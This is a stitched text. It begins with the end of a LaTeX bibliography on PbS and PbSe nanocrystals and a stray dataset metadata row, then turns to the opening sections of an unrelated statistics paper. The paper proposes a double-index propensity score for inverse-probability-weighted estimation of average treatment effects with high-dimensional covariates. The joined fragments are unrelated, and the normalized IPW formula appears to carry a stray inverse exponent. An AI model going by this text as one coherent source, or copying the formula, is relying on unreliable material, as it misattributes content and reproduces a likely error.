\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Wang \latin{et~al.}(1987)Wang, Suna, Mahler, and
Kasowski]{PbS_spectrum}
Wang,~Y.; Suna,~A.; Mahler,~W.; Kasowski,~R. {PbS} in Polymers. From Molecules
to Bulk Solids. \emph{J. Chem. Phys.} \textbf{1987},
\emph{87}, 7315--7322\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Allan and Delerue(2004)Allan, and Delerue]{PbSe_NC_spectrum_Delerue}
Allan,~G.; Delerue,~C. Confinement Effects in {PbSe} Quantum Wells and
Nanocrystals. \emph{Phys. Rev. B} \textbf{2004}, \emph{70}\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Rayleigh(1897)]{Rayleigh_diffraction_aperure}
Rayleigh,~F. R.~S. On the Passage of Waves Through Apertures in Plane Screens,
and Allied Problems. \emph{Philos. Mag. (1798-1977)} \textbf{1897},
\emph{43}, 259--272\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Spencer Domina~Eberle(1988)]{9780387184302}
Moon, P.; Spencer, D.E. \emph{Field Theory Handbook: Including
Coordinate Systems- Differential Equations- and Their Solutions}; A
Springer-Verlag Telos: New-York, 1988\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Zhang and Shklovskii(2004)Zhang, and Shklovskii]{PhysRevB.70.115317}
Zhang,~J.; Shklovskii,~B.~I. Density of States and Conductivity of a Granular
Metal or an Array of Quantum Dots. \emph{Phys. Rev. B} \textbf{2004},
\emph{70}, 115317\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Guttmann(2010)]{Lattice_green_function}
Guttmann,~A.~J. Lattice Green's Functions in All Dimensions. \emph{J. Phys. A: Math. Theor.}
\textbf{2010}, \emph{43},
305205\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\end{mcitethebibliography}
\end{document}
| 2024-02-18T23:40:10.809Z | 2017-02-07T02:07:27.000Z | algebraic_stack_train_0000 | 1,547 | 8,107 |
|
proofpile-arXiv_065-7638 | \section{Introduction}
While randomized clinical trials (RCT) remain the gold standard, large-scale observational data such as electronic medical record (EMR), mobile health, and insurance claims data are playing an increasing role in evaluating treatments in biomedical studies. Such observational data are valuable because they can be collected in contexts where RCTs cannot be run due to cost, ethical, or other feasibility issues \citep{rosenbaum2002observational}.
In the absence of randomization, adjustment for covariates $\mathbf{X}$ that satisfy ``no unmeasured confounding'' (or ``ignorability'' or ``exchangeability'') assumptions is needed to avoid bias from confounding. Many methods based on propensity score (PS), outcome regression, or a combination have been developed to estimate treatment effects under these assumptions (for a review of the basic approaches see \cite{lunceford2004stratification} and \cite{kang2007demystifying}). These methods were initially developed in settings where $p$, the dimension of $\mathbf{X}$, was small relative to the sample size $n$. Modern observational data however tend to include a large number of variables with little prior knowledge known about them.
Regardless of the size of $p$, adjustment for different covariates among all observed $\mathbf{X}$ yields different effects. Let $\mathcal{A}_{\pi}$ index the subset of $\mathbf{X}$ that contributes to the PS $\pi_1(\mathbf{x})=\mathbb P(T=1\mid\mathbf{X}=\mathbf{x})$, where $T\in\{0,1\}$ is the treatment. Let $\mathcal{A}_{\mu}$ index the subset of $\mathbf{X}$ contributing to either $\mu_1(\mathbf{x})$ or $\mu_0(\mathbf{x})$, where $\mu_k(\mathbf{x}) = \mathbb E(Y\mid \mathbf{X}=\mathbf{x},T=k)$ and $Y$ is an outcome.
Beyond adjusting for covariates indexed in $\mathcal{A}_{\pi} \cap \mathcal{A}_{\mu}$ to mitigate confounding, it is well-known that adjusting for covariates in $\mathcal{A}_{\pi}^c\cap\mathcal{A}_{\mu}$ improves the efficiency of PS-based treatment effect estimators, whereas adjusting for covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$ decreases efficiency \citep{lunceford2004stratification,hahn2004functional,brookhart2006variable,rotnitzky2010note,de2011covariate}.
This parallels similar phenomena that occur when adjusting for covariates in regression \citep{tsiatis2008covariate,de2008consequences}.
Early studies using PS-based approaches cautioned against excluding variables among $\mathbf{X}$ to avoid incurring bias from excluding confounders despite potential efficiency loss \citep{perkins2000use,rubin1996matching}.
\cite{vanderweele2011new} proposed a simple criteria to adjust for covariates that are known to be either a cause of $T$ or $Y$. These strategies are not feasible when $p$ is large.
Initial data-driven approaches based on screening marginal associations between covariates in $\mathbf{X}$ with $T$ and $Y$ were considered in \cite{schneeweiss2009high} and \cite{hirano2001estimation}. These approaches, however, can be misleading because marginal associations need not agree with conditional associations. \cite{vansteelandt2012model} and \cite{gruber2015consistent} distinguish the problem of variable selection for estimating causal effects from variable selection for building predictive models and propose stepwise procedures focusing on optimizing treatment effect estimation.
More recently, a number of authors considered regularization methods for variable selection in treatment effect estimation. For example, \cite{belloni2013inference} estimated the joint support $\mathcal{A}_{\pi}\cup\mathcal{A}_{\mu}$ through regularization and obtained treatment effects through a partially linear regression model. \cite{belloni2017program} then considered estimating treatment effects using orthogonal estimating equations (i.e. those of the doubly-robust (DR) estimator \citep{robins1994estimation}) using regularization to estimate models for $\pi_1(\mathbf{x})$ and $\mu_k(\mathbf{x})$. \cite{farrell2015robust} similarly considers estimating treatment effects with the DR estimator using group LASSO to group main and interaction effects in the outcome model. These papers focus on developing theory for existing treatment effect estimators to allow for valid inferences following variable selection. \cite{wilson2014confounder} considered estimating $\mathcal{A}_{\pi} \cup \mathcal{A}_{\mu}$ through a regularized loss function, which simplifies to an adaptive LASSO \citep{zou2006adaptive} problem with a modified penalty that selects out covariates not conditionally associated with either $T$ or $Y$. Treatment effects are estimated through an outcome model after selection. \cite{shortreed2017outcome} proposed an approach that also modifies the weights in an adaptive LASSO for a PS model to select out covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$, estimating the final treatment effect through an inverse probability weighting (IPW) estimator. These approaches modify existing regularization techniques to identify relevant covariates, but there is limited theory to support their performance compared to existing causal inference estimators used with regularization. Furthermore, by relying exclusively on PS- and outcome regression-based approaches to estimate the treatment effect in the end, the double-robustness property is often forfeited.
Alternatively, \cite{koch2017covariate} proposed an adaptive group LASSO to estimate models for $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$ through simultaneously minimizing the sum of their loss functions with a group LASSO penalty grouping together coefficients between the models for the same covariate. The penalty is also weighted by the inverse of the association between each covariate and $Y$ from an initial outcome model to select out covariates belonging to $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$. The estimated nuisance functions are plugged into the standard doubly-robust estimator to estimate the treatment effect. However, selecting out covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$ may inadvertently induce a misspecified model for $\pi_1(\mathbf{x})$ when it is in fact correctly specified given covariates indexed in $\mathcal{A}_{\pi}$. Moreover, the asymptotic distribution is not identified when the nuisance functions are estimated, making it difficult to compare its efficiency with other methods. Bayesian model averaging provides an alternative to regularization methods for variable selection in causal inference problems \citep{wang2012bayesian,zigler2014uncertainty,talbot2015bayesian}. These methods, however, rely on strong parametric assumptions and encounters burdensome computations when $p$ is not small. \cite{cefalu2017model} applied Bayesian model averaging to doubly-robust estimators, averaging doubly-robust estimates over posterior model probabilities of a large collection of combinations of parametric models for the nuisance functions. Priors that prefer models not including covariates belonging to $\mathcal{A}_{\pi}\cap\mathcal{A}_{\boldsymbol\beta}^c$ ease the computations. Despite this innovation, the computations could still be burdensome and possibly unfeasible for large $p$. Most of the aforementioned methods did not consider asymptotic properties allowing $p$ to diverge with $n$.
We consider an IPW-based approach to estimate treatment effects with possibly high-dimensional $\mathbf{X}$. We first use regularized regression to estimate a parametric model for $\pi_1(\mathbf{x})$. Since this neglects associations between $\mathbf{X}$ and $Y$, we also use regularized regression to estimate a model for $\mu_k(\mathbf{x})$, for $k=0,1$. We then calibrate the initial PS estimates by performing nonparametric smoothing of $T$ over the linear predictors for $\mathbf{X}$ from both the initial PS and outcome models. Smoothing over the linear predictors from the outcome model, which can be viewed as a working prognostic score \citep{hansen2008prognostic}, uses the variation in $\mathbf{X}$ predictive of $Y$ to inform estimation of the calibrated PS. We show that our proposed estimator is doubly-robust and locally semiparametric efficient for the ATE under a nonparametric model. Moreover, we show that it achieves potentially substantial gains in robustness and efficiency under misspecification of working models for $\pi_1(\mathbf{x})$ and $\mu_k(\mathbf{x})$. The results are shown to hold allowing $p$ to diverge with $n$ under sparsity assumptions with suitable regularization. The broad approach is similar to a method proposed for estimating mean outcomes in the presence of data missing at random \citep{hu2012semiparametric}, except we use the double-score to estimate a PS instead of an outcome model.
In contrast to their results, we show that a higher-order kernel is required due to the two-dimensional smoothing, find explicit efficiency gains under misspecification of the outcome model, and consider asymptotics with diverging $p$. The combined use of PS and prognostic scores has also recently been suggested for matching and subclassification \citep{leacy2014joint}, but the theoretical properties have not been established. The rest of this paper is organized as follows. The method is introduced in Section \ref{s:method} and its asymptotic properties are discussed in Section \ref{s:asymptotics}. A perturbation-resampling method is proposed for inference in Section \ref{s:perturbation}. Numerical studies including simulations and applications to estimating treatment effects in an EMR study and a cohort study with a large number of covariates is presented in Section \ref{s:numerical}. We conclude with some additional discussion in Section \ref{s:discussion}. Regularity conditions and proofs are relegated to the Web Appendices.
\section{Method} \label{s:method}
\subsection{Notations and Problem Setup}
Let $\mathbf{Z}_i = (Y_i,T_i,\mathbf{X}_i^{\sf \tiny T})^{\sf \tiny T}$ be the observed data for the $i$th subject, where $Y_i$ is an outcome that could be modeled by a generalized linear model (GLM), $T_i\in\{ 0,1\}$ a binary treatment, and $\mathbf{X}_i$ is a $p$-dimensional vector of covariates
with compact support $\mathcal{X}\subseteq\mathbb{R}^{p}$. Here we allow $p$ to diverge with $n$ such that such that $log(p)/log(n) \to \nu$, for $\nu \in [0,1)$. The observed data consists of $n$ independent and identically distributed (iid) observations $\mathscr{D}=\{ \mathbf{Z}_i : i=1,\ldots,n\}$ drawn from the distribution $\mathbb P$. Let $Y_i^{(1)}$ and $Y_i^{(0)}$ denote the counterfactual outcomes \citep{rubin1974estimating} had an individual been treated with treatment $1$ or $0$. Based on $\mathscr{D}$, we want to make inferences about the average treatment effect (ATE):
\begin{align}
\Delta = \mathbb E\{ Y^{(1)}\} - \mathbb E\{ Y^{(0)}\} = \mu_1 - \mu_0.
\end{align}
For identifiability, we require the following standard causal inference assumptions:
\begin{align}
&Y = T Y^{(1)} + (1-T) Y^{(0)} \text{ with probability } 1\label{a:consi}\\
&\pi_1(\mathbf{x}) \in [\epsilon_{\pi},1-\epsilon_{\pi}] \text{ for some } \epsilon_{\pi} >0, \text{ when } \mathbf{x} \in \mathcal{X} \label{a:posi}\\
&Y^{(1)} \perp\!\!\!\perp T \mid \mathbf{X} \text{ and } Y^{(0)}\perp\!\!\!\perp T \mid \mathbf{X}, \label{a:nuca}
\end{align}
where $\pi_k(\mathbf{x}) = P(T=k\mid \mathbf{X}=\mathbf{x})$, for $k=0,1$. Through the third condition we assume from the onset no unmeasured confounding holds given the entire $\mathbf{X}$, which could be plausible when a large set of baseline covariates are included in $\mathbf{X}$. Under these assumptions, it is well-known that $\Delta$ can be identified from the observed data distribution $\mathbb P$ through the g-formula \citep{robins1986new}:
\begin{align}
\Delta^* = \mathbb E\{ \mu_1(\mathbf{X}) - \mu_0(\mathbf{X})\} = \mathbb E\left\{ \frac{I(T=1)Y}{\pi_1(\mathbf{X})}-\frac{I(T=0)Y}{\pi_0(\mathbf{X})}\right\},
\end{align}
where $\mu_k(\mathbf{x}) = \mathbb E(Y\mid \mathbf{X}=\mathbf{x},T=k)$, for $k=0,1$. We will consider an estimator based on the IPW form that will nevertheless be doubly-robust so that it is consistent under parametric models where either $\pi_k(\mathbf{x})$ or $\mu_k(\mathbf{x})$ is correctly specified.
\subsection{Parametric Models for Nuisance Functions} \label{s:models}
As $\mathbf{X}$ is high-dimensional, we consider parametric modeling as a means to reduce the dimensions of $\mathbf{X}$ when estimating the nuisance functions $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$. For reference, let $\mathcal{M}_{np}$ be the nonparametric model for the distribution of $\mathbf{Z}$, $\mathbb P$, that has no restrictions on $\mathbb P$ except requiring the second moment of $\mathbf{Z}$ to be finite. Let $\mathcal{M}_{\pi} \subseteq \mathcal{M}_{np}$ and $\mathcal{M}_{\mu} \subseteq \mathcal{M}_{np}$ respectively denote parametric working models under which:
\begin{align}
&\pi_1(\mathbf{x}) = g_{\pi}(\alpha_0+\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \label{e:psmod} \\
\text{and } &\mu_k(\mathbf{x}) = g_{\mu}(\beta_0 + \beta_1 k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x}), \text{ for } k=0,1,\label{e:ormod}
\end{align}
where $g_{\pi}(\cdot)$ and $g_{\mu}(\cdot)$ are known link functions, and $\vec{\balph}=(\alpha_0,\boldsymbol\alpha^{\sf \tiny T})^{\sf \tiny T}\in\Theta_{\balph} \subseteq \mathbb{R}^{p+1}$ and $\vec{\boldsymbol\beta} = (\beta_0,\beta_1,\boldsymbol\beta_0^{\sf \tiny T},\boldsymbol\beta_1^{\sf \tiny T})^{\sf \tiny T} \in \Theta_{\bbeta} \subseteq \mathbb{R}^{2p+2}$ are unknown parameters.
The specifications in \eqref{e:psmod} or \eqref{e:ormod} could be made more flexible by applying basis expansion functions, such as splines, to $\mathbf{X}$. In \eqref{e:ormod} slopes are allowed to differ by treatment arms to allow for heterogeneous effects of $\mathbf{X}$ between treatments. In data where it is reasonable to assume heterogeneity is weak or nonexistent, it may be beneficial for efficiency to restrict $\boldsymbol\beta_0 = \boldsymbol\beta_1$, in which case \eqref{e:ormod} is simply a main effects model.
We discuss concerns about ancillarity with the main effects model in the \hyperref[s:discussion]{Discussion}.
Regardless of the validity of either working model (i.e. whether $\mathbb P$ belongs in $\mathcal{M}_{\pi} \cup \mathcal{M}_{\mu}$),
we first obtain estimates of $\boldsymbol\alpha$ and $\boldsymbol\beta_k$'s through regularized estimation:
\begin{align}
&(\widehat{\alpha}_0,\widehat{\balph}^{\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\balph}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i) + p_{\pi}(\vec{\balph}_{\{-1\}}; \lambda_{n})\right\} \label{e:psest}\\
&(\widehat{\beta}_0,\widehat{\beta}_1,\widehat{\boldsymbol\beta}_0^{\sf \tiny T},\widehat{\boldsymbol\beta}_1^{\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\boldsymbol\beta}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i) + p_{\mu}(\vec{\boldsymbol\beta}_{\{-1\}};\lambda_{n})\right\}, \label{e:orest}
\end{align}
where $\ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i)$ denotes the log-likelihood for $\vec{\balph}$ under $\mathcal{M}_{\pi}$ given $T_i$ and $\mathbf{X}_i$, $\ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i)$ is a log-likelihood for $\vec{\boldsymbol\beta}$ from a GLM suitable for the outcome type of $Y$ under $\mathcal{M}_{\mu}$ given $\mathbf{Z}_i$, and, for any vector $\mathbf{v}$, $\mathbf{v}_{\{-1\}}$ denotes the subvector of $\mathbf{v}$ excluding the first element. We require penalty functions $p_{\pi}(\mathbf{u};\lambda)$ and $p_{\mu}(\mathbf{u};\lambda)$ to be chosen such that the oracle properties \citep{fan2001variable} hold. An example is the adaptive LASSO \citep{zou2006adaptive}, where $p_{\pi}(\vec{\balph}_{\{-1\}};\lambda_n) =\lambda_n \sum_{j=1}^p \abs{\alpha_j}/\abs{\widetilde{w}_{\pi,j}}^{\gamma} $ with initial weights $\widetilde{w}_{\pi,j}$ estimated from ridge regression, tuning parameter $\lambda_n$ such that $\lambda_n\sqrt{n} \to 0$ and $\lambda_n n^{(1-\nu)(1+\gamma)/2}\to\infty$, and $\gamma > 2\nu/(1-\nu)$ \citep{zou2009adaptive}.
When additional structure is known,
other penalties yielding the oracle properties such as adaptive elastic net \citep{zou2009adaptive} or Group LASSO \citep{wang2008note} penalties can also be used. In principle other variable selection and estimation procedures \citep{wilson2014confounder,koch2017covariate} can also be used, but the theoretical properties may be difficult to verify without the oracle properties.
We assume the true $\boldsymbol\alpha$ and $\boldsymbol\beta_k$'s to be sparse when working models are correctly specified (i.e. when $\mathbb P$ belongs to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$).
For example, in EMRs, a large number of covariates extracted from codified or narrative data can be expected to actually be irrelevant to either the outcome or the treatment assignment processes.
Even when $\mathcal{M}_{\pi}$ or $\mathcal{M}_{\mu}$ is not exactly correctly specified, we assume that the correlation between covariates are not so strong such that the limiting values of $\widehat{\balph}$ and $\widehat{\boldsymbol\beta}_k$, $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, are still sparse. The oracle properties then ensure that the correct support can be selected in large samples. Let $\mathcal{A}_{\boldsymbol\alpha}$ and $\mathcal{A}_{\boldsymbol\beta_k}$ denote the respective support of $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, regardless of the validity of either working model. By selecting out irrelevant covariates belonging to $\mathcal{A}_{\boldsymbol\alpha}^c \cap \mathcal{A}_{\boldsymbol\beta_k}^c$ when estimating the PS $\pi_k(\mathbf{x})$, the efficiency of subsequent IPW estimators for $\mu_k$ can be expected to improve substantially when $p$ is not small.
The regularization in \eqref{e:psest} selects all variables belonging to $\mathcal{A}_{\boldsymbol\alpha}$, which guards against misspecification of the model in \eqref{e:psmod} if variables in $\mathcal{A}_{\boldsymbol\alpha}$ are selected out.
But applying regularization to estimate the PS directly through \eqref{e:psest} only may be inefficient because covariates belonging to $\mathcal{A}_{\boldsymbol\alpha}^c \cap \mathcal{A}_{\boldsymbol\beta_k}$ would be selected out \citep{lunceford2004stratification,brookhart2006variable}.
In the following we consider a calibrated PS based on both $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ and $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ that addresses this shortcoming.
\subsection{Double-Index Propensity Score and IPW Estimator} \label{s:estimator}
To mitigate the effects of misspecification of \eqref{e:psmod}, one could \emph{calibrate} an initial PS estimate $g_{\pi}(\widehat{\alpha}_0+\widehat{\balph}^{\sf \tiny T}\mathbf{X})$ by performing nonparametric smoothing of $T$ over $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$. This adjusts the initial estimates $g_{\pi}(\widehat{\alpha}_0+\mathbf{X}^{\sf \tiny T}\widehat{\balph})$ closer to the true probability of receiving treatment $1$ given $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$. However, we consider a smoothing over not only $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ but also $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ as well to allow variation in covariates predictive of the outcome, i.e. covariates indexed in $\mathcal{A}_{\boldsymbol\beta_k}$, to inform this calibration. In other words, this serves to as a means to include covariates indexed in $\mathcal{A}_{\boldsymbol\beta_k}$ in the smoothing, except that such covariates are initially reduced into $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$.
The double-index PS (DiPS) estimator for each treatment is thus given by:
\begin{align}
\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)= \frac{n^{-1}\sum_{j=1}^nK_h\{(\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}I(T_j=k)}{n^{-1}\sum_{j=1}^n K_h\{(\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}}, \text{ for } k=0,1,
\end{align}
where $\widehat{\boldsymbol\theta}_k = (\widehat{\balph}^{\sf \tiny T},\widehat{\boldsymbol\beta}_k^{\sf \tiny T})^{\sf \tiny T}$, $K_h(\mathbf{u})= h^{-2}K(\mathbf{u}/h)$, and $K(\mathbf{u})$ is a bivariate $q$-th order kernel function with $q>2$. A higher-order kernel is required here for the asymptotics to be well-behaved, which is the price for estimating the nuisance functions $\pi_k(\mathbf{x})$ using two-dimensional smoothing. This allows for the possibility of negative values for $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$. Nevertheless, $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$ are nuisance estimates not of direct interest, and we find in numerical studies that negative values occur infrequently and do not compromise the performance of the final estimator.
A monotone transformation of the input scores for each treatment $\widehat{\mathbf{S}}_k = (\widehat{\balph},\widehat{\boldsymbol\beta}_k)^{\sf \tiny T}\mathbf{X}$ can be applied prior to smoothing to improve finite sample performance \citep{wand1991transformations}. In numerical studies, for instance, we applied a a probability integral transform based on the normal cumulative distribution function to the standardized scores to obtain approximately uniformly distributed inputs. We also scaled components of $\widehat{\mathbf{S}}_k$ such that a common bandwidth $h$ can be used for both components of the score.
With $\pi(\mathbf{x})$ estimated by $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$, the estimator for $\Delta$ is given by $\widehat{\Delta} = \widehat{\mu}_1 - \widehat{\mu}_0$, where:
\begin{align}
\widehat{\mu}_k = \left\{ \sum_{i=1}^n \frac{I(T_i = k)}{\widehat{\pi}_k(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k)}\right\}^{-1}\left\{ \sum_{i=1}^n \frac{I(T_i = k)Y_i}{\widehat{\pi}_k(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k)}\right\}^{-1}, \text{ for } k=0,1.
\end{align}
This is the usual normalized IPW estimator, where, the PS is given by the double-index PS estimates. In the following, we show that this simple construction leads to an estimator that also possesses the robustness and efficiency properties of the doubly-robust estimator derived from semiparametric efficiency theory \citep{robins1994estimation}, and, in certain scenarios, achieves additional gains in robustness and efficiency.
\section{Asymptotic Robustness and Efficiency Properties} \label{s:asymptotics}
We first directly present the influence function expansion of $\widehat{\Delta}$ in general. Robustness and efficiency results are subsequently derived based on the expansion. To present the influence function expansion, let $\bar{\Delta} = \bar{\mu}_1-\bar{\mu}_0$ be the limiting estimand, with:
\begin{align*}
\bar{\mu}_k = \mathbb E\left\{ \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}\right\}, \text{ for } k=0,1,
\end{align*}
$\bar{\boldsymbol\theta}_k = (\bar{\boldsymbol\alpha}^{\sf \tiny T},\bar{\boldsymbol\beta}_k^{\sf \tiny T})^{\sf \tiny T}$, and $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k) = \mathbb P(T_i = k \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$. Moreover, for any vector $\mathbf{v}$ of length $p$ and any index set $\mathcal{A} \subseteq \{ 1,2,\ldots,p\}$, let $\mathbf{v}_{\mathcal{A}}$ denote the subvector with elements indexed in $\mathcal{A}$.
Let $\widehat{\mathcal{W}}_k = n^{1/2}(\widehat{\mu}_k - \bar{\mu}_k)$ for $k=0,1$ so that $n^{1/2}(\widehat{\Delta} - \bar{\Delta}) = \widehat{\mathcal{W}}_1 - \widehat{\mathcal{W}}_0$. We show in Web Appendix D the following result.
\begin{theorem} \label{t:IFexp}
Suppose that causal assumptions \eqref{a:consi}, \eqref{a:posi}, \eqref{a:nuca} and the regularity conditions in Web Appendix A hold. Let the sparsity of $\bar{\boldsymbol\alpha}$ and $\bar{\boldsymbol\beta}_k$, $\abs{\mathcal{A}_{\boldsymbol\alpha}} = s_{\boldsymbol\alpha}$ and $\abs{\mathcal{A}_{\boldsymbol\beta_k}} = s_{\boldsymbol\beta_k}$, be fixed. If $log(p)/log(n) \to \nu$ for $\nu \in [0,1)$,
then, with probability tending to $1$, $\widehat{\mathcal{W}}_k$ has the expansion:
\begin{align}
\widehat{\mathcal{W}}_k &= n^{-1/2}\sum_{i=1}^n \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}-1\right\}\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i =k ) -\bar{\mu}_k \label{e:IFeff}\\
&\qquad + \mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T} n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} + \mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}^{\sf \tiny T} n^{1/2}(\widehat{\boldsymbol\beta}_k - \bar{\boldsymbol\beta}_k)_{\mathcal{A}_{\boldsymbol\beta_k}} + O_p(n^{1/2}h^q + n^{-1/2}h^{-2}), \label{e:IFnui}
\end{align}
for $k=0,1$, where $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}$ and $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\beta_k}}$ are deterministic vectors, $n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} = O_p(1)$, and $n^{1/2}(\widehat{\boldsymbol\beta}_k-\bar{\boldsymbol\beta}_k)_{\mathcal{A}_{\boldsymbol\beta_k}} = O_p(1)$. Under model $\mathcal{M}_{\pi}$ $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}} = \boldsymbol 0$, for $k=0,1$. Under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$, we additionally have that $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}} = \boldsymbol 0$, for $k=0,1$.
\end{theorem}
The challenge in showing Theorem \ref{t:IFexp} is to obtain an influence function expansion when the nuisance functions $\pi_k(\mathbf{x})$ are estimated with two-dimensional kernel-smoothing rather than finite-dimensional models. We show in Web Appendix D that a V-statistic projection lemma \citep{newey1994large} can be applied to obtain the expansion in this situation.
Let $\widehat{\Delta}_{dr}$ denote the usual doubly-robust estimator with $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$ estimated in the same way through \eqref{e:psest} and \eqref{e:orest}. The influence function expansion for $\widehat{\Delta}$ in Theorem \ref{t:IFexp} is nearly identical to that of $\widehat{\Delta}_{dr}$. The terms in \eqref{e:IFeff} are the same except $\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)$ and $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i=k)$ replaces parametric models at the limiting estimates. Terms in \eqref{e:IFnui} analogously represent the additional contributions from estimating the nuisance parameters. The expansion also shows that asymptotically no contribution from smoothing is incurred. This similarity in the influence functions yields similar desirable robustness and efficiency properties, which are improved upon in some cases due to the calibration through smoothing.
\subsection{Robustness}
In terms of robustness, under $\mathcal{M}_{\pi}$, $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k) = \pi_k(\mathbf{x})$ so the limiting estimands are:
\begin{align*}
\bar{\mu}_k = \mathbb E\left\{ \frac{I(T_i = k)Y_i}{\pi_k(\mathbf{X}_i)}\right\} = \mathbb E\{ Y_i^{(k)}\} \text{, for } k =0,1.
\end{align*}
On the other hand, under $\mathcal{M}_{\mu}$, $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i =k) = \mu_k(\mathbf{x})$ so that:
\begin{align*}
\bar{\mu}_k &= \mathbb E\left\{ \mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}^{\sf \tiny T}\mathbf{X}_i,T_i =k)\right\} =\mathbb E\left\{ \mu_k(\mathbf{X}_i)\right\} = \mathbb E\{ Y_i^{(k)}\}, \text{ for } k=0,1.
\end{align*}
Thus by Theorem \ref{t:IFexp}, under $\mathcal{M}_{\pi} \cup \mathcal{M}_{\mu}$, $\widehat{\Delta} - \Delta = O_p(n^{-1/2})$ provided that $h=O(n^{-\alpha})$ for $\alpha \in (\frac{1}{2q},\frac{1}{4})$. That is, $\widehat{\Delta}$ is \emph{doubly-robust} for $\Delta$.
